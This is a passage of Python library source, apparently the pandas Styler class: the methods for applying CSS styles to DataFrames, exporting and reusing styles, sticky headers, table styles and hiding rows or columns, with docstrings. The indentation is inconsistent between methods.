clean_attrs = [a for a in clean_copy.__dict__ if not callable(a)]
self_attrs = [a for a in self.__dict__ if not callable(a)] # maybe more attrs
for attr in clean_attrs:
setattr(self, attr, getattr(clean_copy, attr))
for attr in set(self_attrs).difference(clean_attrs):
delattr(self, attr)
def _apply(
    self,
    func: Callable,
    axis: Axis | None = 0,
    subset: Subset | None = None,
    **kwargs,
) -> Styler:
    """Backend for ``Styler.apply``: run ``func`` over ``subset`` of the data,
    validate the returned styles, and merge them into ``self.ctx``.
    """
    # Normalise subset to a 2d (rows, columns) selection of the data.
    subset = slice(None) if subset is None else subset
    subset = non_reducing_slice(subset)
    data = self.data.loc[subset]
    if axis is None:
        # Table-wise: func receives the whole (subset) DataFrame and must
        # return a DataFrame or an ndarray of identical shape.
        result = func(data, **kwargs)
        if not isinstance(result, DataFrame):
            if not isinstance(result, np.ndarray):
                raise TypeError(
                    f"Function {repr(func)} must return a DataFrame or ndarray "
                    f"when passed to `Styler.apply` with axis=None"
                )
            if not (data.shape == result.shape):
                raise ValueError(
                    f"Function {repr(func)} returned ndarray with wrong shape.\n"
                    f"Result has shape: {result.shape}\n"
                    f"Expected shape: {data.shape}"
                )
            # Wrap the ndarray with the data's labels for ctx merging.
            result = DataFrame(result, index=data.index, columns=data.columns)
    else:
        axis = self.data._get_axis_number(axis)
        if axis == 0:
            result = data.apply(func, axis=0, **kwargs)
        else:
            # Row-wise: apply over the transpose so that funcs returning
            # Series of differing lengths still align correctly.
            result = data.T.apply(func, axis=0, **kwargs).T  # see GH 42005
    if isinstance(result, Series):
        # DataFrame.apply collapsed to a Series: func likely returned scalars.
        raise ValueError(
            f"Function {repr(func)} resulted in the apply method collapsing to a "
            f"Series.\nUsually, this is the result of the function returning a "
            f"single value, instead of list-like."
        )
    # Template with {0}/{1}/{2} placeholders filled per failing axis below.
    msg = (
        f"Function {repr(func)} created invalid {{0}} labels.\nUsually, this is "
        f"the result of the function returning a "
        f"{'Series' if axis is not None else 'DataFrame'} which contains invalid "
        f"labels, or returning an incorrectly shaped, list-like object which "
        f"cannot be mapped to labels, possibly due to applying the function along "
        f"the wrong axis.\n"
        f"Result {{0}} has shape: {{1}}\n"
        f"Expected {{0}} shape: {{2}}"
    )
    # Every label in the result must exist in the (subset) data.
    if not all(result.index.isin(data.index)):
        raise ValueError(msg.format("index", result.index.shape, data.index.shape))
    if not all(result.columns.isin(data.columns)):
        raise ValueError(
            msg.format("columns", result.columns.shape, data.columns.shape)
        )
    self._update_ctx(result)
    return self
@Substitution(subset=subset)
def apply(
    self,
    func: Callable,
    axis: Axis | None = 0,
    subset: Subset | None = None,
    **kwargs,
) -> Styler:
    """
    Apply a CSS-styling function column-wise, row-wise, or table-wise.

    Updates the HTML representation with the result.

    Parameters
    ----------
    func : function
        ``func`` should take a Series if ``axis`` in [0,1] and return a
        list-like object of same length, or a Series, not necessarily of same
        length, with valid index labels considering ``subset``.
        ``func`` should take a DataFrame if ``axis`` is ``None`` and return
        either an ndarray with the same shape or a DataFrame, not necessarily
        of the same shape, with valid index and columns labels considering
        ``subset``.

        .. versionchanged:: 1.3.0

        .. versionchanged:: 1.4.0
    axis : {0 or 'index', 1 or 'columns', None}, default 0
        Apply to each column (``axis=0`` or ``'index'``), to each row
        (``axis=1`` or ``'columns'``), or to the entire DataFrame at once
        with ``axis=None``.
    %(subset)s
    **kwargs : dict
        Pass along to ``func``.

    Returns
    -------
    self : Styler

    See Also
    --------
    Styler.applymap_index: Apply a CSS-styling function to headers elementwise.
    Styler.apply_index: Apply a CSS-styling function to headers level-wise.
    Styler.applymap: Apply a CSS-styling function elementwise.

    Notes
    -----
    The elements of the output of ``func`` should be CSS styles as strings, in
    the format 'attribute: value; attribute2: value2; ...' or, if nothing is to
    be applied to that element, an empty string or ``None``.

    This is similar to ``DataFrame.apply``, except that ``axis=None`` applies
    the function to the entire DataFrame at once, rather than column-wise or
    row-wise.

    Examples
    --------
    >>> def highlight_max(x, color):
    ...     return np.where(x == np.nanmax(x.to_numpy()), f"color: {color};", None)
    >>> df = pd.DataFrame(np.random.randn(5, 2), columns=["A", "B"])
    >>> df.style.apply(highlight_max, color='red')  # doctest: +SKIP
    >>> df.style.apply(highlight_max, color='blue', axis=1)  # doctest: +SKIP
    >>> df.style.apply(highlight_max, color='green', axis=None)  # doctest: +SKIP

    See `Table Visualization <../../user_guide/style.ipynb>`_ user guide for
    more details.
    """
    # Styling is deferred: record the call on the ``_todo`` queue to be
    # replayed against an instance later (see ``_apply``).
    todo_item = (
        lambda instance: getattr(instance, "_apply"),
        (func, axis, subset),
        kwargs,
    )
    self._todo.append(todo_item)
    return self
def _apply_index(
    self,
    func: Callable,
    axis: int | str = 0,
    level: Level | list[Level] | None = None,
    method: str = "apply",
    **kwargs,
) -> Styler:
    # Backend for ``apply_index``/``applymap_index``: style header cells.
    axis = self.data._get_axis_number(axis)
    header = self.index if axis == 0 else self.columns
    levels_ = refactor_levels(level, header)

    # Expand the (Multi)Index into a DataFrame with one column per level and
    # keep only the requested levels.
    data = DataFrame(header.to_list()).loc[:, levels_]

    if method == "apply":
        styles = data.apply(func, axis=0, **kwargs)
    elif method == "applymap":
        styles = data.applymap(func, **kwargs)

    self._update_ctx_header(styles, axis)
    return self
@doc(
    this="apply",
    wise="level-wise",
    alt="applymap",
    altwise="elementwise",
    func="take a Series and return a string array of the same length",
    axis='{0, 1, "index", "columns"}',
    input_note="the index as a Series, if an Index, or a level of a MultiIndex",
    output_note="an identically sized array of CSS styles as strings",
    var="s",
    ret='np.where(s == "B", "background-color: yellow;", "")',
    ret2='["background-color: yellow;" if "x" in v else "" for v in s]',
)
def apply_index(
    self,
    func: Callable,
    axis: int | str = 0,
    level: Level | list[Level] | None = None,
    **kwargs,
) -> Styler:
    """
    Apply a CSS-styling function to the index or column headers, {wise}.

    Updates the HTML representation with the result.

    .. versionadded:: 1.4.0

    Parameters
    ----------
    func : function
        ``func`` should {func}.
    axis : {axis}
        The headers over which to apply the function.
    level : int, str, list, optional
        If index is MultiIndex the level(s) over which to apply the function.
    **kwargs : dict
        Pass along to ``func``.

    Returns
    -------
    self : Styler

    See Also
    --------
    Styler.{alt}_index: Apply a CSS-styling function to headers {altwise}.
    Styler.apply: Apply a CSS-styling function column-wise, row-wise, or table-wise.
    Styler.applymap: Apply a CSS-styling function elementwise.

    Notes
    -----
    Each input to ``func`` will be {input_note}. The output of ``func`` should be
    {output_note}, in the format 'attribute: value; attribute2: value2; ...'
    or, if nothing is to be applied to that element, an empty string or ``None``.

    Examples
    --------
    Basic usage to conditionally highlight values in the index.

    >>> df = pd.DataFrame([[1,2], [3,4]], index=["A", "B"])
    >>> def color_b(s):
    ...     return {ret}
    >>> df.style.{this}_index(color_b)  # doctest: +SKIP

    .. figure:: ../../_static/style/appmaphead1.png

    Selectively applying to specific levels of MultiIndex columns.

    >>> midx = pd.MultiIndex.from_product([['ix', 'jy'], [0, 1], ['x3', 'z4']])
    >>> df = pd.DataFrame([np.arange(8)], columns=midx)
    >>> def highlight_x({var}):
    ...     return {ret2}
    >>> df.style.{this}_index(highlight_x, axis="columns", level=[0, 2])
    ...  # doctest: +SKIP

    .. figure:: ../../_static/style/appmaphead2.png
    """
    # Deferred execution: queue the call on ``_todo``; the "apply" flag makes
    # ``_apply_index`` run ``func`` once per requested header level.
    # NOTE: the docstring above is a template filled by the ``@doc`` decorator.
    self._todo.append(
        (
            lambda instance: getattr(instance, "_apply_index"),
            (func, axis, level, "apply"),
            kwargs,
        )
    )
    return self
@doc(
    apply_index,
    this="applymap",
    wise="elementwise",
    alt="apply",
    altwise="level-wise",
    func="take a scalar and return a string",
    axis='{0, 1, "index", "columns"}',
    input_note="an index value, if an Index, or a level value of a MultiIndex",
    output_note="CSS styles as a string",
    var="v",
    ret='"background-color: yellow;" if v == "B" else None',
    ret2='"background-color: yellow;" if "x" in v else None',
)
def applymap_index(
    self,
    func: Callable,
    axis: int | str = 0,
    level: Level | list[Level] | None = None,
    **kwargs,
) -> Styler:
    # Docstring is generated from ``apply_index`` by the ``@doc`` decorator.
    # Deferred execution: queue the call on ``_todo``; the "applymap" flag
    # makes ``_apply_index`` run ``func`` once per header cell (elementwise).
    self._todo.append(
        (
            lambda instance: getattr(instance, "_apply_index"),
            (func, axis, level, "applymap"),
            kwargs,
        )
    )
    return self
def _applymap(
    self, func: Callable, subset: Subset | None = None, **kwargs
) -> Styler:
    # Backend for ``Styler.applymap``: elementwise styling over ``subset``.
    # Bind keyword arguments up front since DataFrame.applymap passes none.
    func = partial(func, **kwargs)  # applymap doesn't take kwargs?
    selection = IndexSlice[:] if subset is None else subset
    selection = non_reducing_slice(selection)
    styles = self.data.loc[selection].applymap(func)
    self._update_ctx(styles)
    return self
@Substitution(subset=subset)
def applymap(
    self, func: Callable, subset: Subset | None = None, **kwargs
) -> Styler:
    """
    Apply a CSS-styling function elementwise.

    Updates the HTML representation with the result.

    Parameters
    ----------
    func : function
        ``func`` should take a scalar and return a string.
    %(subset)s
    **kwargs : dict
        Pass along to ``func``.

    Returns
    -------
    self : Styler

    See Also
    --------
    Styler.applymap_index: Apply a CSS-styling function to headers elementwise.
    Styler.apply_index: Apply a CSS-styling function to headers level-wise.
    Styler.apply: Apply a CSS-styling function column-wise, row-wise, or table-wise.

    Notes
    -----
    The elements of the output of ``func`` should be CSS styles as strings, in
    the format 'attribute: value; attribute2: value2; ...' or, if nothing is to
    be applied to that element, an empty string or ``None``.

    Examples
    --------
    >>> def color_negative(v, color):
    ...     return f"color: {color};" if v < 0 else None
    >>> df = pd.DataFrame(np.random.randn(5, 2), columns=["A", "B"])
    >>> df.style.applymap(color_negative, color='red')  # doctest: +SKIP

    See `Table Visualization <../../user_guide/style.ipynb>`_ user guide for
    more details.
    """
    # Styling is deferred: record the call on the ``_todo`` queue to be
    # replayed against an instance later (see ``_applymap``).
    todo_item = (
        lambda instance: getattr(instance, "_applymap"),
        (func, subset),
        kwargs,
    )
    self._todo.append(todo_item)
    return self
@Substitution(subset=subset)
def where(
    self,
    cond: Callable,
    value: str,
    other: str | None = None,
    subset: Subset | None = None,
    **kwargs,
) -> Styler:
    """
    Apply CSS-styles based on a conditional function elementwise.

    .. deprecated:: 1.3.0

    Updates the HTML representation with a style which is
    selected in accordance with the return value of a function.

    Parameters
    ----------
    cond : callable
        ``cond`` should take a scalar, and optional keyword arguments, and
        return a boolean.
    value : str
        Applied when ``cond`` returns true.
    other : str
        Applied when ``cond`` returns false.
    %(subset)s
    **kwargs : dict
        Pass along to ``cond``.

    Returns
    -------
    self : Styler

    See Also
    --------
    Styler.applymap: Apply a CSS-styling function elementwise.
    Styler.apply: Apply a CSS-styling function column-wise, row-wise, or table-wise.

    Notes
    -----
    This method is deprecated.

    This method is a convenience wrapper for :meth:`Styler.applymap`, which we
    recommend using instead, e.g. by refactoring
    ``df.style.where(cond, value='color:green;', other='color:red;')``
    to an equivalent ``df.style.applymap(style_func, value=..., other=...)``
    where ``style_func`` returns ``value`` or ``other`` from ``cond``.
    """
    warnings.warn(
        "this method is deprecated in favour of `Styler.applymap()`",
        FutureWarning,
        stacklevel=find_stack_level(),
    )

    other = "" if other is None else other

    # Delegate to applymap with a closure choosing between the two styles.
    def _choose(val):
        return value if cond(val, **kwargs) else other

    return self.applymap(_choose, subset=subset)
def set_precision(self, precision: int) -> StylerRenderer:
    """
    Set the precision used to display values.

    .. deprecated:: 1.3.0

    Parameters
    ----------
    precision : int

    Returns
    -------
    self : Styler

    Notes
    -----
    This method is deprecated see `Styler.format`.
    """
    warnings.warn(
        "this method is deprecated in favour of `Styler.format(precision=..)`",
        FutureWarning,
        stacklevel=find_stack_level(),
    )
    # Retain the attribute for backwards compatibility, then delegate the
    # actual work to ``format``.
    self.precision = precision
    return self.format(precision=precision, na_rep=self.na_rep)
def set_table_attributes(self, attributes: str) -> Styler:
"""
Set the table attributes added to the ``<table>`` HTML element.
These are items in addition to automatic (by default) ``id`` attribute.
Parameters
----------
attributes : str
Returns
-------
self : Styler
See Also
--------
Styler.set_table_styles: Set the table styles included within the ``<style>``
HTML element.
Styler.set_td_classes: Set the DataFrame of strings added to the ``class``
attribute of ``<td>`` HTML elements.
Examples
--------
>>> df = pd.DataFrame(np.random.randn(10, 4))
>>> df.style.set_table_attributes('class="pure-table"') # doctest: +SKIP
# ... <table class="pure-table"> ...
"""
self.table_attributes = attributes
return self
def export(self) -> dict[str, Any]:
"""
Export the styles applied to the current Styler.
Can be applied to a second Styler with ``Styler.use``.
Returns
-------
styles : dict
See Also
--------
Styler.use: Set the styles on the current Styler.
Styler.copy: Create a copy of the current Styler.
Notes
-----
This method is designed to copy non-data dependent attributes of
one Styler to another. It differs from ``Styler.copy`` where data and
data dependent attributes are also copied.
The following items are exported since they are not generally data dependent:
- Styling functions added by the ``apply`` and ``applymap``
- Whether axes and names are hidden from the display, if unambiguous.
- Table attributes
- Table styles
The following attributes are considered data dependent and therefore not
exported:
- Caption
- UUID
- Tooltips
- Any hidden rows or columns identified by Index labels
- Any formatting applied using ``Styler.format``
- Any CSS classes added using ``Styler.set_td_classes``
Examples
--------
>>> styler = DataFrame([[1, 2], [3, 4]]).style
>>> styler2 = DataFrame([[9, 9, 9]]).style
>>> styler.hide_index().highlight_max(axis=1) # doctest: +SKIP
>>> export = styler.export()
>>> styler2.use(export) # doctest: +SKIP
"""
return {
"apply": copy.copy(self._todo),
"table_attributes": self.table_attributes,
"table_styles": copy.copy(self.table_styles),
"hide_index": all(self.hide_index_),
"hide_columns": all(self.hide_columns_),
"hide_index_names": self.hide_index_names,
"hide_column_names": self.hide_column_names,
"css": copy.copy(self.css),
}
def use(self, styles: dict[str, Any]) -> Styler:
"""
Set the styles on the current Styler.
Possibly uses styles from ``Styler.export``.
Parameters
----------
styles : dict(str, Any)
List of attributes to add to Styler. Dict keys should contain only:
- "apply": list of styler functions, typically added with ``apply`` or
``applymap``.
- "table_attributes": HTML attributes, typically added with
``set_table_attributes``.
- "table_styles": CSS selectors and properties, typically added with
``set_table_styles``.
- "hide_index": whether the index is hidden, typically added with
``hide_index``, or a boolean list for hidden levels.
- "hide_columns": whether column headers are hidden, typically added with
``hide_columns``, or a boolean list for hidden levels.
- "hide_index_names": whether index names are hidden.
- "hide_column_names": whether column header names are hidden.
- "css": the css class names used.
Returns
-------
self : Styler
See Also
--------
Styler.export : Export the non data dependent attributes to the current Styler.
Examples
--------
>>> styler = DataFrame([[1, 2], [3, 4]]).style
>>> styler2 = DataFrame([[9, 9, 9]]).style
>>> styler.hide_index().highlight_max(axis=1) # doctest: +SKIP
>>> export = styler.export()
>>> styler2.use(export) # doctest: +SKIP
"""
self._todo.extend(styles.get("apply", []))
table_attributes: str = self.table_attributes or ""
obj_table_atts: str = (
""
if styles.get("table_attributes") is None
else str(styles.get("table_attributes"))
)
self.set_table_attributes((table_attributes + " " + obj_table_atts).strip())
if styles.get("table_styles"):
self.set_table_styles(styles.get("table_styles"), overwrite=False)
for obj in ["index", "columns"]:
hide_obj = styles.get("hide_" + obj)
if hide_obj is not None:
if isinstance(hide_obj, bool):
n = getattr(self, obj).nlevels
setattr(self, "hide_" + obj + "_", [hide_obj] * n)
else:
setattr(self, "hide_" + obj + "_", hide_obj)
self.hide_index_names = styles.get("hide_index_names", False)
self.hide_column_names = styles.get("hide_column_names", False)
if styles.get("css"):
self.css = styles.get("css") # type: ignore[assignment]
return self
def set_uuid(self, uuid: str) -> Styler:
"""
Set the uuid applied to ``id`` attributes of HTML elements.
Parameters
----------
uuid : str
Returns
-------
self : Styler
Notes
-----
Almost all HTML elements within the table, and including the ``<table>`` element
are assigned ``id`` attributes. The format is ``T_uuid_<extra>`` where
``<extra>`` is typically a more specific identifier, such as ``row1_col2``.
"""
self.uuid = uuid
return self
def set_caption(self, caption: str | tuple) -> Styler:
"""
Set the text added to a ``<caption>`` HTML element.
Parameters
----------
caption : str, tuple
For HTML output either the string input is used or the first element of the
tuple. For LaTeX the string input provides a caption and the additional
tuple input allows for full captions and short captions, in that order.
Returns
-------
self : Styler
"""
msg = "`caption` must be either a string or 2-tuple of strings."
if isinstance(caption, tuple):
if (
len(caption) != 2
or not isinstance(caption[0], str)
or not isinstance(caption[1], str)
):
raise ValueError(msg)
elif not isinstance(caption, str):
raise ValueError(msg)
self.caption = caption
return self
    def set_sticky(
        self,
        axis: Axis = 0,
        pixel_size: int | None = None,
        levels: Level | list[Level] | None = None,
    ) -> Styler:
        """
        Add CSS to permanently display the index or column headers in a scrolling frame.
        Parameters
        ----------
        axis : {0 or 'index', 1 or 'columns'}, default 0
            Whether to make the index or column headers sticky.
        pixel_size : int, optional
            Required to configure the width of index cells or the height of column
            header cells when sticking a MultiIndex (or with a named Index).
            Defaults to 75 and 25 respectively.
        levels : int, str, list, optional
            If ``axis`` is a MultiIndex the specific levels to stick. If ``None`` will
            stick all levels.
        Returns
        -------
        self : Styler
        Notes
        -----
        This method uses the CSS 'position: sticky;' property to display. It is
        designed to work with visible axes, therefore both:
        - `styler.set_sticky(axis="index").hide_index()`
        - `styler.set_sticky(axis="columns").hide_columns()`
        may produce strange behaviour due to CSS controls with missing elements.
        """
        axis = self.data._get_axis_number(axis)
        obj = self.data.index if axis == 0 else self.data.columns
        # Default sizes: 75px wide for sticky index cells, 25px tall for header rows.
        pixel_size = (75 if axis == 0 else 25) if not pixel_size else pixel_size
        # CSS shared by every sticky rule generated below.
        props = "position:sticky; background-color:white;"
        if not isinstance(obj, pd.MultiIndex):
            # handling MultiIndexes requires different CSS
            if axis == 1:
                # stick the first <tr> of <head> and, if index names, the second <tr>
                # if self._hide_columns then no <thead><tr> here will exist: no conflict
                styles: CSSStyles = [
                    {
                        "selector": "thead tr:nth-child(1) th",
                        "props": props + "top:0px; z-index:2;",
                    }
                ]
                if not self.index.names[0] is None:
                    # a named index adds a second header row that must also stick
                    styles[0]["props"] = (
                        props + f"top:0px; z-index:2; height:{pixel_size}px;"
                    )
                    styles.append(
                        {
                            "selector": "thead tr:nth-child(2) th",
                            "props": props
                            + f"top:{pixel_size}px; z-index:2; height:{pixel_size}px; ",
                        }
                    )
            else:
                # stick the first <th> of each <tr> in both <thead> and <tbody>
                # if self._hide_index then no <th> will exist in <tbody>: no conflict
                # but <th> will exist in <thead>: conflict with initial element
                styles = [
                    {
                        "selector": "thead tr th:nth-child(1)",
                        "props": props + "left:0px; z-index:3 !important;",
                    },
                    {
                        "selector": "tbody tr th:nth-child(1)",
                        "props": props + "left:0px; z-index:1;",
                    },
                ]
        else:
            # handle the MultiIndex case
            range_idx = list(range(obj.nlevels))
            levels_: list[int] = refactor_levels(levels, obj) if levels else range_idx
            levels_ = sorted(levels_)
            if axis == 1:
                styles = []
                for i, level in enumerate(levels_):
                    # each stuck header row is offset by the rows stuck above it
                    styles.append(
                        {
                            "selector": f"thead tr:nth-child({level+1}) th",
                            "props": props
                            + (
                                f"top:{i * pixel_size}px; height:{pixel_size}px; "
                                "z-index:2;"
                            ),
                        }
                    )
                if not all(name is None for name in self.index.names):
                    # index names occupy one extra header row below the stuck levels
                    styles.append(
                        {
                            "selector": f"thead tr:nth-child({obj.nlevels+1}) th",
                            "props": props
                            + (
                                f"top:{(i+1) * pixel_size}px; height:{pixel_size}px; "
                                "z-index:2;"
                            ),
                        }
                    )
            else:
                styles = []
                for i, level in enumerate(levels_):
                    # each stuck index column is offset by the columns stuck to its left
                    props_ = props + (
                        f"left:{i * pixel_size}px; "
                        f"min-width:{pixel_size}px; "
                        f"max-width:{pixel_size}px; "
                    )
                    styles.extend(
                        [
                            {
                                "selector": f"thead tr th:nth-child({level+1})",
                                "props": props_ + "z-index:3 !important;",
                            },
                            {
                                "selector": f"tbody tr th.level{level}",
                                "props": props_ + "z-index:1;",
                            },
                        ]
                    )
        return self.set_table_styles(styles, overwrite=False)
    def set_table_styles(
        self,
        table_styles: dict[Any, CSSStyles] | CSSStyles | None = None,
        axis: int = 0,
        overwrite: bool = True,
        css_class_names: dict[str, str] | None = None,
    ) -> Styler:
        """
        Set the table styles included within the ``<style>`` HTML element.
        This function can be used to style the entire table, columns, rows or
        specific HTML selectors.
        Parameters
        ----------
        table_styles : list or dict
            If supplying a list, each individual table_style should be a
            dictionary with ``selector`` and ``props`` keys. ``selector``
            should be a CSS selector that the style will be applied to
            (automatically prefixed by the table's UUID) and ``props``
            should be a list of tuples with ``(attribute, value)``.
            If supplying a dict, the dict keys should correspond to
            column names or index values, depending upon the specified
            `axis` argument. These will be mapped to row or col CSS
            selectors. MultiIndex values as dict keys should be
            in their respective tuple form. The dict values should be
            a list as specified in the form with CSS selectors and
            props that will be applied to the specified row or column.
            .. versionchanged:: 1.2.0
        axis : {0 or 'index', 1 or 'columns', None}, default 0
            Apply to each column (``axis=0`` or ``'index'``), to each row
            (``axis=1`` or ``'columns'``). Only used if `table_styles` is
            dict.
            .. versionadded:: 1.2.0
        overwrite : bool, default True
            Styles are replaced if `True`, or extended if `False`. CSS
            rules are preserved so most recent styles set will dominate
            if selectors intersect.
            .. versionadded:: 1.2.0
        css_class_names : dict, optional
            A dict of strings used to replace the default CSS classes described below.
            .. versionadded:: 1.4.0
        Returns
        -------
        self : Styler
        See Also
        --------
        Styler.set_td_classes: Set the DataFrame of strings added to the ``class``
            attribute of ``<td>`` HTML elements.
        Styler.set_table_attributes: Set the table attributes added to the ``<table>``
            HTML element.
        Notes
        -----
        The default CSS classes dict, whose values can be replaced is as follows:
        .. code-block:: python
            css_class_names = {"row_heading": "row_heading",
                               "col_heading": "col_heading",
                               "index_name": "index_name",
                               "col": "col",
                               "col_trim": "col_trim",
                               "row_trim": "row_trim",
                               "level": "level",
                               "data": "data",
                               "blank": "blank"}
        Examples
        --------
        >>> df = pd.DataFrame(np.random.randn(10, 4),
        ...                   columns=['A', 'B', 'C', 'D'])
        >>> df.style.set_table_styles(
        ...     [{'selector': 'tr:hover',
        ...       'props': [('background-color', 'yellow')]}]
        ... )  # doctest: +SKIP
        Or with CSS strings
        >>> df.style.set_table_styles(
        ...     [{'selector': 'tr:hover',
        ...       'props': 'background-color: yellow; font-size: 1em;'}]
        ... )  # doctest: +SKIP
        Adding column styling by name
        >>> df.style.set_table_styles({
        ...     'A': [{'selector': '',
        ...            'props': [('color', 'red')]}],
        ...     'B': [{'selector': 'td',
        ...            'props': 'color: blue;'}]
        ... }, overwrite=False)  # doctest: +SKIP
        Adding row styling
        >>> df.style.set_table_styles({
        ...     0: [{'selector': 'td:hover',
        ...          'props': [('font-size', '25px')]}]
        ... }, axis=1, overwrite=False)  # doctest: +SKIP
        See `Table Visualization <../../user_guide/style.ipynb>`_ user guide for
        more details.
        """
        # Merge any user-supplied CSS class-name overrides into the defaults.
        if css_class_names is not None:
            self.css = {**self.css, **css_class_names}
        if table_styles is None:
            return self
        elif isinstance(table_styles, dict):
            # Dict form: keys are row/column labels; translate each label to its
            # positional ``.row<N>`` / ``.col<N>`` CSS class selector.
            axis = self.data._get_axis_number(axis)
            obj = self.data.index if axis == 1 else self.data.columns
            idf = f".{self.css['row']}" if axis == 1 else f".{self.css['col']}"
            table_styles = [
                {
                    "selector": str(s["selector"]) + idf + str(idx),
                    "props": maybe_convert_css_to_tuples(s["props"]),
                }
                for key, styles in table_styles.items()
                for idx in obj.get_indexer_for([key])
                for s in format_table_styles(styles)
            ]
        else:
            # List form: normalise ``props`` to (attribute, value) tuples.
            table_styles = [
                {
                    "selector": s["selector"],
                    "props": maybe_convert_css_to_tuples(s["props"]),
                }
                for s in table_styles
            ]
        # Extend existing styles when overwrite=False, otherwise replace them.
        if not overwrite and self.table_styles is not None:
            self.table_styles.extend(table_styles)
        else:
            self.table_styles = table_styles
        return self
def set_na_rep(self, na_rep: str) -> StylerRenderer:
"""
Set the missing data representation on a ``Styler``.
.. versionadded:: 1.0.0
.. deprecated:: 1.3.0
Parameters
----------
na_rep : str
Returns
-------
self : Styler
Notes
-----
This method is deprecated. See `Styler.format()`
"""
warnings.warn(
"this method is deprecated in favour of `Styler.format(na_rep=..)`",
FutureWarning,
stacklevel=find_stack_level(),
)
self.na_rep = na_rep
return self.format(na_rep=na_rep, precision=self.precision)
    def hide_index(
        self,
        subset: Subset | None = None,
        level: Level | list[Level] | None = None,
        names: bool = False,
    ) -> Styler:
        """
        Hide the entire index, or specific keys in the index from rendering.
        This method has dual functionality:
        - if ``subset`` is ``None`` then the entire index, or specified levels, will
          be hidden whilst displaying all data-rows.
        - if a ``subset`` is given then those specific rows will be hidden whilst the
          index itself remains visible.
        .. versionchanged:: 1.3.0
        .. deprecated:: 1.4.0
           This method should be replaced by ``hide(axis="index", **kwargs)``
        Parameters
        ----------
        subset : label, array-like, IndexSlice, optional
            A valid 1d input or single key along the index axis within
            `DataFrame.loc[<subset>, :]`, to limit ``data`` to *before* applying
            the function.
        level : int, str, list
            The level(s) to hide in a MultiIndex if hiding the entire index. Cannot be
            used simultaneously with ``subset``.
            .. versionadded:: 1.4.0
        names : bool
            Whether to hide the index name(s), in the case the index or part of it
            remains visible.
            .. versionadded:: 1.4.0
        Returns
        -------
        self : Styler
        See Also
        --------
        Styler.hide: Hide the entire index / columns, or specific rows / columns.
        """
        # Deprecated thin wrapper: delegate to the unified ``hide`` with axis=0.
        warnings.warn(
            "this method is deprecated in favour of `Styler.hide(axis='index')`",
            FutureWarning,
            stacklevel=find_stack_level(),
        )
        return self.hide(axis=0, level=level, subset=subset, names=names)
    def hide_columns(
        self,
        subset: Subset | None = None,
        level: Level | list[Level] | None = None,
        names: bool = False,
    ) -> Styler:
        """
        Hide the column headers or specific keys in the columns from rendering.
        This method has dual functionality:
        - if ``subset`` is ``None`` then the entire column headers row, or
          specific levels, will be hidden whilst the data-values remain visible.
        - if a ``subset`` is given then those specific columns, including the
          data-values will be hidden, whilst the column headers row remains visible.
        .. versionchanged:: 1.3.0
        .. deprecated:: 1.4.0
           This method should be replaced by ``hide(axis="columns", **kwargs)``
        Parameters
        ----------
        subset : label, array-like, IndexSlice, optional
            A valid 1d input or single key along the columns axis within
            `DataFrame.loc[:, <subset>]`, to limit ``data`` to *before* applying
            the function.
        level : int, str, list
            The level(s) to hide in a MultiIndex if hiding the entire column headers
            row. Cannot be used simultaneously with ``subset``.
            .. versionadded:: 1.4.0
        names : bool
            Whether to hide the column index name(s), in the case all column headers,
            or some levels, are visible.
            .. versionadded:: 1.4.0
        Returns
        -------
        self : Styler
        See Also
        --------
        Styler.hide: Hide the entire index / columns, or specific rows / columns.
        """
        # Deprecated thin wrapper: delegate to the unified ``hide`` with axis=1.
        warnings.warn(
            "this method is deprecated in favour of `Styler.hide(axis='columns')`",
            FutureWarning,
            stacklevel=find_stack_level(),
        )
        return self.hide(axis=1, level=level, subset=subset, names=names)
    def hide(
        self,
        subset: Subset | None = None,
        axis: Axis = 0,
        level: Level | list[Level] | None = None,
        names: bool = False,
    ) -> Styler:
        """
        Hide the entire index / column headers, or specific rows / columns from display.
        .. versionadded:: 1.4.0
        Parameters
        ----------
        subset : label, array-like, IndexSlice, optional
            A valid 1d input or single key along the axis within
            `DataFrame.loc[<subset>, :]` or `DataFrame.loc[:, <subset>]` depending
            upon ``axis``, to limit ``data`` to select hidden rows / columns.
        axis : {"index", 0, "columns", 1}
            Apply to the index or columns.
        level : int, str, list
            The level(s) to hide in a MultiIndex if hiding the entire index / column
            headers. Cannot be used simultaneously with ``subset``.
        names : bool
            Whether to hide the level name(s) of the index / columns headers in the case
            it (or at least one of the levels) remains visible.
        Returns
        -------
        self : Styler
        Notes
        -----
        This method has multiple functionality depending upon the combination
        of the ``subset``, ``level`` and ``names`` arguments (see examples). The
        ``axis`` argument is used only to control whether the method is applied to row
        or column headers:
        .. list-table:: Argument combinations
           :widths: 10 20 10 60
           :header-rows: 1
           * - ``subset``
             - ``level``
             - ``names``
             - Effect
           * - None
             - None
             - False
             - The axis-Index is hidden entirely.
           * - None
             - None
             - True
             - Only the axis-Index names are hidden.
           * - None
             - Int, Str, List
             - False
             - Specified axis-MultiIndex levels are hidden entirely.
           * - None
             - Int, Str, List
             - True
             - Specified axis-MultiIndex levels are hidden entirely and the names of
               remaining axis-MultiIndex levels.
           * - Subset
             - None
             - False
             - The specified data rows/columns are hidden, but the axis-Index itself,
               and names, remain unchanged.
           * - Subset
             - None
             - True
             - The specified data rows/columns and axis-Index names are hidden, but
               the axis-Index itself remains unchanged.
           * - Subset
             - Int, Str, List
             - Boolean
             - ValueError: cannot supply ``subset`` and ``level`` simultaneously.
        Note this method only hides the identified elements so can be chained to hide
        multiple elements in sequence.
        Examples
        --------
        Simple application hiding specific rows:
        >>> df = pd.DataFrame([[1,2], [3,4], [5,6]], index=["a", "b", "c"])
        >>> df.style.hide(["a", "b"])  # doctest: +SKIP
             0    1
        c    5    6
        Hide the index and retain the data values:
        >>> midx = pd.MultiIndex.from_product([["x", "y"], ["a", "b", "c"]])
        >>> df = pd.DataFrame(np.random.randn(6,6), index=midx, columns=midx)
        >>> df.style.format("{:.1f}").hide()  # doctest: +SKIP
                         x                    y
           a      b      c      a      b      c
         0.1    0.0    0.4    1.3    0.6   -1.4
         0.7    1.0    1.3    1.5   -0.0   -0.2
         1.4   -0.8    1.6   -0.2   -0.4   -0.3
         0.4    1.0   -0.2   -0.8   -1.2    1.1
        -0.6    1.2    1.8    1.9    0.3    0.3
         0.8    0.5   -0.3    1.2    2.2   -0.8
        Hide specific rows in a MultiIndex but retain the index:
        >>> df.style.format("{:.1f}").hide(subset=(slice(None), ["a", "c"]))
        ...   # doctest: +SKIP
                                 x                    y
                   a      b      c      a      b      c
        x   b    0.7    1.0    1.3    1.5   -0.0   -0.2
        y   b   -0.6    1.2    1.8    1.9    0.3    0.3
        Hide specific rows and the index through chaining:
